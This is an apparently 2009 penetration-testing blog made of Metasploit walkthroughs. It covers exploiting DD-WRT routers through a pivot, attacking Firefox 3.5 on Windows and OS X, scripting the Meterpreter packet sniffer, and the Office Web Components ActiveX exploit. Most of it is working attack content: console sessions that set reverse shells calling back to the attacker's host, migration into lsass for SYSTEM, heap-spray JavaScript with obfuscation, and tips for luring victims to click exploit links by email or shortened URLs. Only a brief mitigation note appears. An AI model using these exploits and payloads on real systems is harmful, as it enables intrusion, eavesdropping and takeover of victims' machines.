Shell is only the Beginning

Metasploit now has in the 3.3 Dev SVN an exploit for embedded device Linux distribution DD-WRT. This exploit module abuses a metacharacter injection vulnerability in the  HTTP management server of wireless gateways running DD-WRT. This flaw allows an unauthenticated attacker to execute arbitrary commands as the root user account. It was argued that this exploit is of low impact by some since the distribution only listens for HTTP connections thru the internal interface. In this example of using the exploit the exploit will be used thru a pivot obtained thru a client side exploit from which we will pivot, do a discovery, finger print the device and exploit it.  In the following example we will start by showing our IP of the attacker machine, receiving the Meterpreter shell and showing the target box IP thru a cmd shell:

msf > ifconfig eth0
[*] exec: ifconfig eth0
eth0      Link encap:Ethernet  HWaddr 00:0e:7f:f9:12:62  
          inet addr:192.168.1.158  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::20e:7fff:fef9:1262/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:55461 errors:0 dropped:0 overruns:0 frame:0
          TX packets:23899 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:58889891 (58.8 MB)  TX bytes:3107063 (3.1 MB)
          Interrupt:20 
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp 
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.158
LHOST => 192.168.1.158
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.
msf exploit(handler) > 
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.100:1085)
msf exploit(handler) > session -i 1
[-] Unknown command: session.
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo 
Computer: AWINXP01
OS      : Windows XP (Build 2600, Service Pack 2).
meterpreter > execute -H -f -c -i -f cmd.exe
Process 1708 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\administrator\Desktop>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
        Connection-specific DNS Suffix  . : 
        IP Address. . . . . . . . . . . . : 192.168.111.200
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.111.2
C:\Documents and Settings\administrator\Desktop>exit
meterpreter > 

Know we proceed to background this session and set a route thru the session to the network behind the NAT router from the information we gathered:

meterpreter > 
Background session 1? [y/N]  
msf exploit(handler) > 
msf exploit(handler) > route add 192.168.111.0 255.255.255.0 1
msf exploit(handler) > route print
Active Routing Table
====================
   Subnet             Netmask            Gateway    
   ------             -------            -------    
   192.168.111.0      255.255.255.0      Session 1  
msf exploit(handler) > 

Now that the route is created we can use the TCP Port Scanner Auxiliary Module to do a TCP scan of the default gateway of the target network:

msf exploit(handler) > use auxiliary/scanner/portscan/tcp 
msf auxiliary(tcp) > info
       Name: TCP Port Scanner
    Version: 6823
    License: Metasploit Framework License (BSD)
Provided by:
  hdm <hdm@metasploit.com>
  kris katterjohn <katterjohn@gmail.com>
Basic options:
  Name     Current Setting  Required  Description                                  
  ----     ---------------  --------  -----------                                  
  PORTS    1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)        
  RHOSTS                    yes       The target address range or CIDR identifier  
  THREADS  1                yes       The number of concurrent threads             
  TIMEOUT  1000             yes       The socket connect timeout in milliseconds   
Description:
  Enumerate open TCP services
msf auxiliary(tcp) > set PORTS 22,23,80,443
PORTS => 22,23,80,443
msf auxiliary(tcp) > set RHOSTS 192.168.111.2
RHOSTS => 192.168.111.2
msf auxiliary(tcp) > run
[*]  TCP OPEN 192.168.111.2:22
[*]  TCP OPEN 192.168.111.2:23
[*]  TCP OPEN 192.168.111.2:80
[*] Auxiliary module execution completed
msf exploit(handler) >

Since we are going thru a Meterpreter TCP pivot is important to remember to keep the THREAD variable to 1 since Meterpreter is not multithreaded and limit the number of ports to those you want to target so as to not expend a large amount of time scanning. Now that the ports that are open we proceed to finger print one of the services by getting the banner using the connect command in Metasploit:

msf exploit(handler) > connect -c 1 192.168.111.2 23
[*] Connected to 192.168.111.2:23
DD-WRT v24 std (c) 2007 NewMedia-NET GmbH
Release: 01/26/07 (SVN revision: 5660M)
�
DD-WRTx86CI login: ^Cmsf exploit(handler) > 
msf exploit(handler) > 

As we can see the Telnet login banner identifies the target machine as a DD-WRT box. We know proceed to load the exploit module and set a reverse netcat payload and set the other appropriate variables. Onece we have ran the exploit and a session is created we proceed to run the Linux uname command to check the version of the device and to also check the shell is working:

msf exploit(handler) > use exploit/linux/http/ddwrt_cgibin_exec 
msf exploit(ddwrt_cgibin_exec) > set PAYLOAD cmd/unix/reverse_netcat 
PAYLOAD => cmd/unix/reverse_netcat
msf exploit(ddwrt_cgibin_exec) > set LPORT 2222
LPORT => 2222
msf exploit(ddwrt_cgibin_exec) > set RHOST 192.168.111.2
RHOST => 192.168.111.2
msf exploit(ddwrt_cgibin_exec) > set LHOST 192.168.1.158
LHOST => 192.168.1.158
msf exploit(ddwrt_cgibin_exec) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Sending GET request with encoded command line...
[*] Command shell session 2 opened (192.168.1.158:2222 -> 192.168.1.100:4531)
uname -a
Linux DD-WRTx86CI 2.6.19.2dd-wrt #45 Fri Jan 26 06:28:01 CET 2007 i686 unknown

One advantage is that since the shell is running thru a Meterpreter session all traffic outside of the target network to the attackers box is encrypted using SSL.

For more information on this vulnerability please check the following links:

http://www.securityfocus.com/bid/35742
http://www.milw0rm.com/exploits/9209

The exploit that was covered recently in an earlier blog post on the Firefox 3.5 escape () value memory corruption exploit that worked against Windows XP, this exploit has now been expanded to now cover OSX 10.5.7 and it has been improved so no script problem message is shown to the user requiring interaction by him. For use against an OSX target the attack might look something like this:

carlos@loki:~/svn/msf3-dev$ sudo nc -vv -l -p 80
[sudo] password for carlos: 
listening on [any] 80 ...
connect to [192.168.1.158] from carlos-perezs-computer.local [192.168.1.120] 58924
GET / HTTP/1.1
Host: 192.168.1.158
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
^C sent 0, rcvd 370

Here the target was trick initially to connect to a Netcat listener so we could look at the User Agent string to identify the target OS and Browser, this could have been also easily done creating a fake webpage and having the victim connect and look at the logs or a sniffer capture. We continue by launching Metasploit, selecting the exploit, payload and setting the proper target:

carlos@loki:~/svn/msf3-dev$ sudo ./msfconsole
                __.                       .__.        .__. __.
  _____   _____/  |______    ____________ |  |   ____ |__|/  |_
 /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
|  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
|__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
      \/     \/          \/     \/ |__|
       =[ msf v3.3-dev
+ -- --=[ 384 exploits - 261 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 166 aux
msf > use exploit/multi/browser/firefox_escape_retval
msf exploit(firefox_escape_retval) >  show targets
Exploit targets:
   Id  Name                                      
   --  ----                                      
   0   Firefox 3.5.0 on Windows XP SP0-SP3       
   1   Firefox 3.5.0 on Mac OS X 10.5.7 (Intel)  
msf exploit(firefox_escape_retval) > set TARGET 1
TARGET => 1
msf exploit(firefox_escape_retval) > set PAYLOAD osx/x86/vforkshell_reverse_tcp
PAYLOAD => osx/x86/vforkshell_reverse_tcp
msf exploit(firefox_escape_retval) > set LHOST 192.168.1.158
LHOST => 192.168.1.158

As it can be seen the payload selected was the vforkshell and one of the main advantages of this shell is that since it uses the vfork() Unix call to spawn it self it does not run under the process exploited so when the target kills the hanged browser we do not loose our shell access. Since we launched the exploit as root we can change the port to listen for the exploit to port 80 making it easier to exploit a target behind a Proxy or Firewall, change the URI path to one less suspicious and launch the exploit:

msf exploit(firefox_escape_retval) > set SRVPORT 80
SRVPORT => 80
msf exploit(firefox_escape_retval) > set URIPATH secretdocumets.html
URIPATH => secretdocumets.html
msf exploit(firefox_escape_retval) > exploit
[*] Exploit running as background job.
msf exploit(firefox_escape_retval) > 
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:80/secretdocumets.html
[*]  Local IP: http://192.168.1.158:80/secretdocumets.html
[*] Server started.

Once the targets connects to our exploit it will launch the exploit javascript code with the payload:

[*] Sending Firefox 3.5 escape() Return Value Memory Corruption to 192.168.1.120:52760...
[*] Command shell session 1 opened (192.168.1.158:4444 -> 192.168.1.120:52770)

Once the shell is created we can interact with it, one important thing to remember is that environment variables set for the shell are the ones for the process exploited so we will have to use full path when calling certain commands:

msf exploit(firefox_escape_retval) > sessions -l
Active sessions
===============
  Id  Description    Tunnel                                     
  --  -----------    ------                                     
  1   Command shell  192.168.1.158:4444 -> 192.168.1.120:52770  
msf exploit(firefox_escape_retval) > sessions -i 1
[*] Starting interaction with 1...
id
uid=501(labuser) gid=501(labuser) groups=501(labuser),98(_lpadmin),81(_appserveradm),79(_appserverusr),80(admin)
uname -a
Darwin testmac.local 9.7.0 Darwin Kernel Version 9.7.0: Tue Mar 31 22:52:17 PDT 2009; root:xnu-1228.12.14~1/RELEASE_I386 i386
env
PWD=/sbin
SHLVL=1
_=/usr/bin/env
OLDPWD=/bin
/sbin/ifconfig
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
	inet6 fe80::1%lo0 prefixlen 64 scopeid 0x1 
	inet 127.0.0.1 netmask 0xff000000 
	inet6 ::1 prefixlen 128 
gif0: flags=8010<POINTOPOINT,MULTICAST> mtu 1280
stf0: flags=0<> mtu 1280
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	ether 00:16:cb:9f:9e:11 
	media: autoselect status: inactive
	supported media: autoselect 10baseT/UTP <half-duplex> 10baseT/UTP <full-duplex> 10baseT/UTP <full-duplex,hw-loopback> 10baseT/UTP <full-duplex,flow-control> 100baseTX <half-duplex> 100baseTX <full-duplex> 100baseTX <full-duplex,hw-loopback> 100baseTX <full-duplex,flow-control> 1000baseT <full-duplex> 1000baseT <full-duplex,hw-loopback> 1000baseT <full-duplex,flow-control> none
fw0: flags=8802<BROADCAST,SIMPLEX,MULTICAST> mtu 2030
	lladdr 00:17:f2:ff:fe:71:a7:b4 
	media: autoselect <full-duplex> status: inactive
	supported media: autoselect <full-duplex>
en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	inet6 fe80::217:f2ff:fe99:d7cf%en1 prefixlen 64 scopeid 0x6 
	inet 192.168.1.120 netmask 0xffffff00 broadcast 192.168.1.255
	ether 00:17:f2:99:d7:cf 
	media: autoselect status: active
	supported media: autoselect
en4: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	ether 00:16:cb:33:3e:50 
	media: autoselect status: inactive
	supported media: none autoselect 10baseT/UTP <half-duplex>
vmnet8: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	inet 192.168.187.1 netmask 0xffffff00 broadcast 192.168.187.255
	ether 00:50:56:c0:00:08 
vmnet1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	inet 192.168.38.1 netmask 0xffffff00 broadcast 192.168.38.255
	ether 00:50:56:c0:00:01 
exit
[*] Command shell session 1 closed.

This exploit will be added to the Browser Autopwn module in Metasploit after Defcon 17.

Automating post exploitation as much as possible with out risking losing any data or putting at risk the availability of the targeted host is very important for any pentester. I would like share how I would automate the Meterpreter Sniffer Module by scripting the recording of all packets captured by the new sniffer module. This post will require some Ruby and programming knowledge to get the most value from it, I recommend for anyone starting the Pragmatic Ruby and to read the Metasploit Documentation,  I tend to start by understanding the API calls for the module and what better way than using the irb shell in Meterpreter for this specific module we can read the Module Command Dispatcher code. To access the irb (Interactive Ruby Shell) in Meterpreter we simply issue the irb command:

meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>>

Once in the shell I load the module using the Rex API call for the Core System:

>> client.core.use("sniffer")
=> true
>>

The above output shows the Boolean confirmation that the module was loaded. We know proceed to list the interfaces, this is done using the client.sniffer.interfaces() API call:

>> client.sniffer.interfaces()
=> [{"name"=>"\\Device\\{DFB388B6-0F0F-4A3A-B264-B1D95D9762AD}", "mtu"=>1514, "usable"=>true, "type"=>0, "idx"=>1, "dhcp"=>true, "wireless"=>false, "description"=>"VMware Accelerated AMD PCNet Adapter"}]
>>

W can see that it returned all the interface information, if you need to know the class of the information returned for when you script this you can just put a .class at the end to see what is the returning class of the value returned:

>> client.sniffer.interfaces().class
=> Array
>> client.sniffer.interfaces().each do |i|
?> puts i.class
>> end
Hash
=> [{"name"=>"\\Device\\{DFB388B6-0F0F-4A3A-B264-B1D95D9762AD}", "mtu"=>1514, "usable"=>true, "type"=>0, "idx"=>1, "dhcp"=>true, "wireless"=>false, "description"=>"VMware Accelerated AMD PCNet Adapter"}]
>>

We get returned an Array, and when we iterate thru we see that each member of the array where the interface information is given is a Hash. This means you can get from each interface any piece information contained in the hash by asking for the key of the piece of information I’m looking for:

>> client.sniffer.interfaces().each do |i|
?> puts i['description']
>> end
VMware Accelerated AMD PCNet Adapter
=> [{"name"=>"\\Device\\{DFB388B6-0F0F-4A3A-B264-B1D95D9762AD}", "mtu"=>1514, "usable"=>true, "type"=>0, "idx"=>1, "dhcp"=>true, "wireless"=>false, "description"=>"VMware Accelerated AMD PCNet Adapter"}]
>>

Here you can see I asked for hash key “description” and this gave me the description of the interface. Now that I have this info I can proceed to start the capture, this is achieved by using the client.sniffer.capture_start(intf, maxp) API call, this call accepts 2 values the first one is the interface index whish if we look at the Hash that we get with the Interface information is the “idx” key, the next value is the maximum number of packets to store in the buffer, both of this values are Integer:

>> client.sniffer.capture_start(1, 200000)
=> #<Rex::Post::Meterpreter::Packet:0xb679244c @tlvs=[#<Rex::Post::Meterpreter::Tlv:0xb6792028 @value="sniffer_capture_start", @type=65537>, #<Rex::Post::Meterpreter::Tlv:0xb6791f10 @value="39088353728762718472713126289025", @type=65538>, #<Rex::Post::Meterpreter::Tlv:0xb6791dbc @value=0, @type=131076>], @type=1>
>>

After running the API call the TLV command to the module to start the capture. Now after generating some traffic we what to know how many packets and the size of the capture we have so far, this is achieved by using the client.sniffer.capture_stats(intf) API call where we give it the interface index as an Integer:

>> client.sniffer.capture_stats(1)
=> {:bytes=>401107, :packets=>870}
>> client.sniffer.capture_stats(1).class
=> Hash
>>

We get a Hash value back where we can tell by each of the key names of the hash what information are we getting back, the number of packets and the number of bytes captured. Know we want to clear the buffer and retrieve the captured information, this is done with the client.sniffer.capture_dump(intf) where we get the buffer information and the clear it. To read the data we use the client.sniffer.capture_dump_read(intf,1024*512) We pass to both API call the interface index and on the read the amount of data to read (512k) at a time:

>> res = client.sniffer.capture_dump(1)
=> {:bytes=>1504, :packets=>16}
>> res = client.sniffer.capture_dump_read(1,1024*512)
=> {:bytes=>1504, :data=>"\000\000\000\000\000\000\000\005\001\312\003!\253J\236\236\000\000\000J\000\f)Ek/\000\f)\261\353\026\b\000E\000\000<\001(\000\000\200\001\000\000\n\n\n\003\004\002\002\002\b\000?\\\002\000\f\000abcdefghijklmnopqrstuvwabcdefghi\000\000\000\000\000\000\000\006\001\312\003!\253V\212`\000\000\000J\000\f)\261\353\026\000\f)Ek/\b\000E\000\000<\204\314\000\0000\001\353\344\004\002\002\002\n\n\n\003\000\000G\\\002\000\f\000abcdefghijklmnopqrstuvwabcdefghi\000\000\000\000\000\000\000\a\001\312\003!\253\3435\036\000\000\000J\000\f)Ek/\000\f)\261\353\026\b\000E\000\000<\001)\000\000\200\001\000\000\n\n\n\003\004\002\002\002\b\000>\\\002\000\r\000abcdefghijklmnopqrstuvwabcdefghi\000\000\000\000\000\000\000\b\001\312\003!\253\352\\,\000\000\000J\000\f)\261\353\026\000\f)Ek/\b\000E\000\000<u\265\000\000/\001\373\373\004\002\002\002\n\n\n\003\000\000F\\\002\000\r\000abcdefghijklmnopqrstuvwabcdefghi\000\000\000\000\000\000\000\t\001\312\003!\254{\313\236\000\000\000J\000\f)Ek/\000\f)\261\353\026\b\000E\000\000<\001*\000\000\200\001\000\000\n\n\n\003\004\002\002\002\b\000=\\\002\000\016\000abcdefghijklmnopqrstuvwabcdefghi\000\000\000\000\000\000\000\n\001\312\003!\254\202\362\254\000\000\000J\000\f)\261\353\026\000\f)Ek/\b\000E\000\000<\003\221\000\000/\001n \004\002\002\002\n\n\n\003\000\000E\\\002\000\016\000abcdefghijklmnopqrstuvwabcdefghi\000\000\000\000\000\000\000\v\001\312\003!\255\024b\036\000\000\000J\000\f)Ek/\000\f)\261\353\026\b\000E\000\000<\001+\000\000\200\001\000\000\n\n\n\003\004\002\002\002\b\000<\\\002\000\017\000abcdefghijklmnopqrstuvwabcdefghi\000\000\000\000\000\000\000\f\001\312\003!\255\e\211,\000\000\000J\000\f)\261\353\026\000\f)Ek/\b\000E\000\000<\030\254\000\000/\001Y\005\004\002\002\002\n\n\n\003\000\000D\\\002\000\017\000abcdefghijklmnopqrstuvwabcdefghi\000\000\000\000\000\000\000\r\001\312\003!\256\345L\254\000\000\000J\000\f)Ek/\000\f)\261\353\026\b\000E\000\000<\001\255\000\000\200\001\000\000\n\n\n\003\004\002\002\002\b\000;\\\002\000\020\000abcdefghijklmnopqrstuvwabcdefghi\000\000\000\000\000\000\000\016\001\312\003!\256\356\326\024\000\000\000J\000\f)\261\353\026\000\f)Ek/\b\000E\000\000<X\363\000\000/\001\030\276\004\002\002\002\n\n\n\003\000\000C\\\002\000\020\000abcdefghijklmnopqrstuvwabcdefghi\000\000\000\000\000\000\000\017\001\312\003!\257\200E\206\000\000\000J\000\f)Ek/\000\f)\261\353\026\b\000E\000\000<\001\256\000\000\200\001\000\000\n\n\n\003\004\002\002\002\b\000:\\\002\000\021\000abcdefghijklmnopqrstuvwabcdefghi\000\000\000\000\000\000\000\020\001\312\003!\257\211\316\356\000\000\000J\000\f)\261\353\026\000\f)Ek/\b\000E\000\000<\271\234\000\0000\001\267\024\004\002\002\002\n\n\n\003\000\000B\\\002\000\021\000abcdefghijklmnopqrstuvwabcdefghi\000\000\000\000\000\000\000\021\001\312\003!\260\035\240\272\000\000\000J\000\f)Ek/\000\f)\261\353\026\b\000E\000\000<\001\257\000\000\200\001\000\000\n\n\n\003\004\002\002\002\b\0009\\\002\000\022\000abcdefghijklmnopqrstuvwabcdefghi\000\000\000\000\000\000\000\022\001\312\003!\260$\307\310\000\000\000J\000\f)\261\353\026\000\f)Ek/\b\000E\000\000<\321\257\000\0000\001\237\001\004\002\002\002\n\n\n\003\000\000A\\\002\000\022\000abcdefghijklmnopqrstuvwabcdefghi\000\000\000\000\000\000\000\023\001\312\003!\260\270\231\224\000\000\000J\000\f)Ek/\000\f)\261\353\026\b\000E\000\000<\001\260\000\000\200\001\000\000\n\n\n\003\004\002\002\002\b\0008\\\002\000\023\000abcdefghijklmnopqrstuvwabcdefghi\000\000\000\000\000\000\000\024\001\312\003!\260\277\300\242\000\000\000J\000\f)\261\353\026\000\f)Ek/\b\000E\000\000<\244\262\000\000/\001\314\376\004\002\002\002\n\n\n\003\000\000@\\\002\000\023\000abcdefghijklmnopqrstuvwabcdefghi"}
>>

Now that we have seen the captured data we stop the capture all together by using the client.sniffer.capture_stop(intf) API call where we again pass the interface index as a value:

>> client.sniffer.capture_stop(1)
=> #<Rex::Post::Meterpreter::Packet:0xb69e382c @tlvs=[#<Rex::Post::Meterpreter::Tlv:0xb69e2aa8 @value="sniffer_capture_stop", @type=65537>, #<Rex::Post::Meterpreter::Tlv:0xb69e2968 @value="53778635515875175792402459228002", @type=65538>, #<Rex::Post::Meterpreter::Tlv:0xb69e2774 @value=0, @type=131076>], @type=1>
>>

Metasploit has released an exploit for Mozilla Firefox version 3.5 Tracemonkey components of Firefox's javascript rendering engine. The bug is covered in in Mozilla’s Bugzilla as bug 503286. The first public exploit seen was in Milw0rm by the author SBerry aka Simon Berry-Byrne, he gives thanks to HD for his help in writing the exploit code which was later converted by HD in to a Metasploit module.  The main exploit code is a javascript generated with the selected payload and then encoded to make it more difficult to be detected by HIPS, IPS and IDS systems. A way to use this module would be running msfconsole as root so as to be able to use low ports for our listeners:

carlos@loki:~/svn/msf3-dev$ sudo ./msfconsole
[sudo] password for carlos:
                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##
       =[ msf v3.3-dev
+ -- --=[ 384 exploits - 261 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 166 aux
msf >

We then select the exploit and a Meterpreter reverse TCP shell:

msf > use exploit/multi/browser/firefox_escape_retval
msf exploit(firefox_escape_retval) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

We take a look at the options available:

msf exploit(firefox_escape_retval) > show options
Module options:
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Use SSL
   URIPATH                   no        The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST                      yes       The local address
   LPORT     4444             yes       The local port
Exploit target:
   Id  Name
   --  ----
   0   Firefox 3.5.0 on Windows XP SP0-SP3

A recommended way of attacking would be to set the port for the exploit to port 80 since this is the default port for HTTP which will be the protocol we will use to exploit the browser, we will set a friendly URI path:

msf exploit(firefox_escape_retval) > set SRVPORT 80
SRVPORT => 80
msf exploit(firefox_escape_retval) > set URIPATH secret.html
URIPATH => secret.html

For the payload we will set the local host from where we are lunching the attack and to where we want the target to connect back to, we choose port 443 the default port for HTTPS since the chances of this port being open in most environments tend to be high:

msf exploit(firefox_escape_retval) > set LHOST 192.168.1.158
LHOST => 192.168.1.158
msf exploit(firefox_escape_retval) > set LPORT 443
LPORT => 443

Now the exploit is ran and it will listen for the targets connection:

msf exploit(firefox_escape_retval) > exploit
[*] Exploit running as background job.
msf exploit(firefox_escape_retval) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:80/secret.html
[*]  Local IP: http://192.168.1.158:80/secret.html
[*] Server started.

We craft our email or other type of message for the target to read and we inform him that he might get a popup stating that the script may have hanged and to just click continue since is normal. The message that will appear at the target will be something similar to this:

When the client click on the link the exploit will be deployed with the payload:

[*] Sending Firefox 3.5 escape() Return Value Memory Corruption to 192.168.1.139:1046...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (192.168.1.158:443 -> 192.168.1.139:1047)
msf exploit(firefox_escape_retval) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer: WINXPLAB01
OS      : Windows XP (Build 2600, Service Pack 2).

Since the browser window will hang and might be closed by the target it is important to migrate of that process as quickly as possible so we run the migrate script:

meterpreter > run migrate
[*] Migrating to lsass.exe...
[*] Current server process: firefox.exe (1800)
[*] New server process: lsass.exe (684)
meterpreter > sysinfo
Computer: WINXPLAB01
OS      : Windows XP (Build 2600, Service Pack 2).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

This exploit differs from the latest ones made public for IE ActiveX controls since this exploit may require some additional steps to be conducted by the target system to be able to get a shell back. This exploit only works at the moment of this writing for Windows XP SP0 – SP3 with Firefox 3.5.0 and in testing it was found that it did not worked 100% of the time since several tries where needed on some of the labs machines while others worked on the first try.

A way to mitigate this attack would be to change in Firefox by entering in the address bar the about:config and changing the parameter for javascript.options.jit.content or simply using the NoScript add-on. The mitigation on a large enterprise will be difficult do to that a GPO (Group Policy Object) can not be pushed to client and logging script is one of the alternatives that will have to be used to mitigate the risk. 

HD Moore has released another IE 0 day Metasploit Exploit Module in less than 2 weeks The Office Web Component Exploit in Metasploit committed to the Dev 3.3 SVN will attack this vulnerability on:

• Windows XP SP0 to SP3 with IE6 or IE7 with Office XP or Office 2003 Installed

The exploit will exploit in specific the spreadsheet component of the ActiveX. the code for the whole exploit can be seen in trac.metasploit.com. 

Here is a brief description of the main parts of the code that make this exploit. The exploit as done in Metasploit will create a encode key for the java payload:

@javascript_encode_key = rand_text_alpha(rand(10) + 10)

Then when a URI request is done against the listening exploit the Java code is encoded and presented to the target making this exploit very hard to detect by HIPS, IDS, AV and IPS alike. The main body of Javascript code is:

shellcode = Rex::Text.to_unescape(p.encoded)
retaddr   = Rex::Text.to_unescape([target.ret].pack('V'))
js = %Q|
		var xshellcode = unescape("#{shellcode}");
		var xarray = new Array();
		var xls = 0x81000-(xshellcode.length*2);
		var xbigblock = unescape("#{retaddr}");
		while( xbigblock.length < xls / 2) { xbigblock += xbigblock; }
		var xlh = xbigblock.substring(0, xls / 2);
		delete xbigblock;
		for(xi=0; xi<0x99*2; xi++) {
				xarray[xi] = xlh + xlh + xshellcode;
		}
		CollectGarbage();
		var xobj = new ActiveXObject("OWC10.Spreadsheet");
		xe = new Array();
		xe.push(1);
		xe.push(2);
		xe.push(0);
		xe.push(window);
		for(xi=0;xi<xe.length;xi++){
				for(xj=0;xj<10;xj++){
						try { xobj.Evaluate(xe[xi]); } catch(e) { }
				}
		}
		window.status = xe[3] + '';
		for(xj=0; xj<10; xj++){
				try{ xobj.msDataSourceObject(xe[3]); } catch(e) { }
		}
|

Then this payload is encoded with the key and presented to the target:

# Obfuscate it up a bit
encoded_js = obfuscate_js(js,
		'Symbols' =>
				{
						'Variables' => %W{ xshellcode xarray xls xbigblock xlh xi xobj xe xj}
				})
# Encode the javascript payload
# encoded_js = encrypt_js(encoded_js, @javascript_encode_key)
# Fire off the page to the client
send_response(cli, "<html><script language='javascript'>#{encoded_js}</script></html>")
# Handle the payload
handler(cli)

To use the exploit we must load the exploit at the msfconsole, for this example the console will be ran as root since we want to use port 80 for the exploit handler to listen to, this will help by using the default port 80 port for when doing directed attacks and there might be some filtering on the target network, we set the exploit and payload:

carlos@loki:~/svn/msf3-dev$ sudo ./msfconsole
[sudo] password for carlos:
                                  _
                                 | |      o
 _  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                           /|
                           \|
       =[ msf v3.3-dev
+ -- --=[ 384 exploits - 261 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 166 aux
msf > use exploit/windows/browser/owc_spreadsheet_msdso
msf exploit(owc_spreadsheet_msdso) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(owc_spreadsheet_msdso) > set LHOST 192.168.1.158
LHOST => 192.168.1.158

Know we take a look at the other options we have available for this module and we change the port to listen on to 80:

msf exploit(owc_spreadsheet_msdso) > show options
Module options:
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Use SSL
   URIPATH                   no        The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     192.168.1.158    yes       The local address
   LPORT     4444             yes       The local port
Exploit target:
   Id  Name
   --  ----
   0   Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0
msf exploit(owc_spreadsheet_msdso) > set SRVPORT 80
SRVPORT => 80

We know launch the exploit and make sure no errors are reported:

msf exploit(owc_spreadsheet_msdso) > exploit
[*] Exploit running as background job.
msf exploit(owc_spreadsheet_msdso) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:80/4fwmCRO
[*]  Local IP: http://192.168.1.158:80/4fwmCRO
[*] Server started.

We can now send and email, tweet with URL shortened or any other method od delivery of the address to the target. Once the exploit is ran we must quickly migrate off the process since IE will hang and a user might kill the process destroying our shell:

[*] Sending Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption to 192.168.1.139:1067...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.139:1068)
msf exploit(owc_spreadsheet_msdso) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > run migrate
[*] Migrating to lsass.exe...
[*] Current server process: iexplore.exe (1328)
[*] New server process: lsass.exe (684)
meterpreter >
meterpreter > sysinfo
Computer: WINXPLAB01
OS      : Windows XP (Build 2600, Service Pack 2).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

